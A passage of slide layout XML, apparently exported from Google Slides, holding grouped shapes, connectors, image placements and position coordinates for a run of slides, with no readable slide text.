        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Google Shape;1031;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2" name="Google Shape;1032;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3" name="Google Shape;1033;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4" name="Google Shape;1034;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5" name="Shape 1035"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1036" name="Google Shape;1036;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7" name="Google Shape;1037;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8" name="Google Shape;1038;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9" name="Google Shape;1039;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0" name="Shape 1040"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1041" name="Google Shape;1041;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2" name="Google Shape;1042;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3" name="Google Shape;1043;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4" name="Google Shape;1044;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5" name="Google Shape;1045;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6" name="Google Shape;1046;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7" name="Google Shape;1047;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8" name="Shape 1048"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1049" name="Google Shape;1049;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0" name="Google Shape;1050;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1" name="Google Shape;1051;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2" name="Google Shape;1052;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3" name="Google Shape;1053;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4" name="Google Shape;1054;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6" name="Shape 1056"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1057" name="Google Shape;1057;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8" name="Google Shape;1058;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59" name="Google Shape;1059;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0" name="Shape 1060"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1061" name="Google Shape;1061;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2" name="Google Shape;1062;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3" name="Google Shape;1063;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5" name="Shape 1065"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;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7" name="Shape 1067"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;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69" name="Google Shape;1069;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513873" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1070" name="Google Shape;1070;p63"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1071" name="Google Shape;1071;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2" name="Google Shape;1072;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3" name="Google Shape;1073;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4" name="Google Shape;1074;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79" name="Google Shape;1079;p63"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1080" name="Google Shape;1080;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1" name="Google Shape;1081;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2" name="Shape 1082"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Google Shape;802;p192" id="1083" name="Google Shape;1083;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4" name="Google Shape;1084;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5" name="Google Shape;1085;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6" name="Shape 1086"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;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8" name="Google Shape;1088;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4" name="Google Shape;1094;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1095" idx="0"/>
            <a:endCxn id="1096"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7" name="Google Shape;1097;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8" name="Google Shape;1098;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9" name="Google Shape;1099;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0" name="Google Shape;1100;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1" name="Google Shape;1101;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0" name="Google Shape;1110;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1" name="Google Shape;1111;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1112"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3" name="Google Shape;1113;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4" name="Google Shape;1114;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5" name="Google Shape;1115;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1116" idx="0"/>
            <a:endCxn id="1117"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7" name="Google Shape;1117;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6" name="Google Shape;1116;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5" name="Google Shape;1095;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2" name="Google Shape;1112;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8" name="Google Shape;1118;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19" name="Google Shape;1119;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0" name="Google Shape;1120;p65"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1121"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2" name="Google Shape;1122;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1" name="Google Shape;1121;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3" name="Google Shape;1123;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4" name="Shape 1124"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125;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6" name="Google Shape;1126;p66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513873" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1127" name="Google Shape;1127;p66"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1128" name="Google Shape;1128;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29" name="Google Shape;1129;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0" name="Google Shape;1130;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1" name="Google Shape;1131;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6" name="Google Shape;1136;p66"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1137" name="Google Shape;1137;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8" name="Google Shape;1138;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39" name="Google Shape;1139;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0" name="Google Shape;1140;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1" name="Shape 1141"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1142" name="Google Shape;1142;p67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513873" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1143" name="Google Shape;1143;p67"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1144" name="Google Shape;1144;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5" name="Google Shape;1145;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6" name="Google Shape;1146;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7" name="Google Shape;1147;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2" name="Google Shape;1152;p67"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1153" name="Google Shape;1153;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4" name="Google Shape;1154;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5" name="Google Shape;1155;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6" name="Shape 1156"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513873" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1158" name="Google Shape;1158;p68"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1159" name="Google Shape;1159;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0" name="Google Shape;1160;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1" name="Google Shape;1161;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2" name="Google Shape;1162;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7" name="Google Shape;1167;p68"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1168" name="Google Shape;1168;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69" name="Google Shape;1169;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0" name="Shape 1170"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Google Shape;1171;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2" name="Google Shape;1172;p69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1173" name="Google Shape;1173;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4" name="Google Shape;1174;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5" name="Google Shape;1175;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6" name="Google Shape;1176;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1" name="Google Shape;1181;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2" name="Google Shape;1182;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3" name="Shape 1183"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1185" name="Google Shape;1185;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6" name="Google Shape;1186;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7" name="Google Shape;1187;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8" name="Google Shape;1188;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3" name="Google Shape;1193;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4" name="Google Shape;1194;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5" name="Google Shape;1195;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6" name="Google Shape;1196;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7" name="Google Shape;1197;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8" name="Shape 1198"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;1199;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0" name="Google Shape;1200;p71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1201" name="Google Shape;1201;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2" name="Google Shape;1202;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3" name="Google Shape;1203;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4" name="Google Shape;1204;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09" name="Google Shape;1209;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0" name="Google Shape;1210;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1" name="Google Shape;1211;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2" name="Google Shape;1212;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3" name="Google Shape;1213;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4" name="Shape 1214"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1216" name="Google Shape;1216;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7" name="Google Shape;1217;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8" name="Google Shape;1218;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19" name="Google Shape;1219;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4" name="Google Shape;1224;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5" name="Google Shape;1225;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6" name="Google Shape;1226;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7" name="Shape 1227"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1228" name="Google Shape;1228;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1229" name="Google Shape;1229;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0" name="Google Shape;1230;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1" name="Google Shape;1231;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2" name="Google Shape;1232;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7" name="Google Shape;1237;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8" name="Google Shape;1238;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39" name="Google Shape;1239;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0" name="Shape 1240"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1242" name="Google Shape;1242;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3" name="Google Shape;1243;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4" name="Google Shape;1244;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5" name="Google Shape;1245;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0" name="Google Shape;1250;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1" name="Google Shape;1251;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2" name="Shape 1252"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1253" name="Google Shape;1253;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1254" name="Google Shape;1254;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5" name="Google Shape;1255;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6" name="Google Shape;1256;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7" name="Google Shape;1257;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2" name="Shape 1262"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1263" name="Google Shape;1263;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4" name="Shape 1264"/>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5" name="Shape 1265"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1266" name="Google Shape;1266;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7" name="Google Shape;1267;p78"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1268" name="Google Shape;1268;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69" name="Google Shape;1269;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0" name="Google Shape;1270;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1" name="Google Shape;1271;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6" name="Google Shape;1276;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7" name="Google Shape;1277;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8" name="Shape 1278"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Google Shape;1279;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0" name="Google Shape;1280;p79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1281" name="Google Shape;1281;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2" name="Google Shape;1282;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3" name="Google Shape;1283;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4" name="Google Shape;1284;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89" name="Google Shape;1289;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0" name="Google Shape;1290;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1" name="Shape 1291"/>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2" name="Shape 1292"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1293" name="Google Shape;1293;p81"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1294" name="Google Shape;1294;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5" name="Google Shape;1295;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6" name="Google Shape;1296;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7" name="Google Shape;1297;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2" name="Google Shape;1302;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3" name="Google Shape;1303;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4" name="Google Shape;1304;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5" name="Shape 1305"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1306" name="Google Shape;1306;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7" name="Google Shape;1307;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8" name="Google Shape;1308;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09" name="Google Shape;1309;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311" name="Shape 1311"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1312" name="Google Shape;1312;p8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13" name="Google Shape;1313;p83"/>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14" name="Google Shape;1314;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5" name="Google Shape;1315;p8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1316" name="Shape 1316"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1317" name="Google Shape;1317;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2498" l="0" r="0" t="2489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="0"/>
            <a:ext cx="24377650" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1318" name="Google Shape;1318;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731375" y="1734175"/>
            <a:ext cx="22915500" cy="11376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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605850" y="3676875"/>
            <a:ext cx="195144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0" name="Google Shape;1320;p8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23" name="Google Shape;1323;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605850" y="5949700"/>
            <a:ext cx="195144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4" name="Google Shape;1324;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605850" y="8196925"/>
            <a:ext cx="195144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5" name="Google Shape;1325;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605850" y="10450600"/>
            <a:ext cx="195144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26" name="Google Shape;1326;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3740828"/>
            <a:ext cx="2094299" cy="1618400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1327" name="Google Shape;1327;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5938928"/>
            <a:ext cx="2094299" cy="1618400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1328" name="Google Shape;1328;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152516" y="10444195"/>
            <a:ext cx="2094299" cy="1618400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1329" name="Google Shape;1329;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
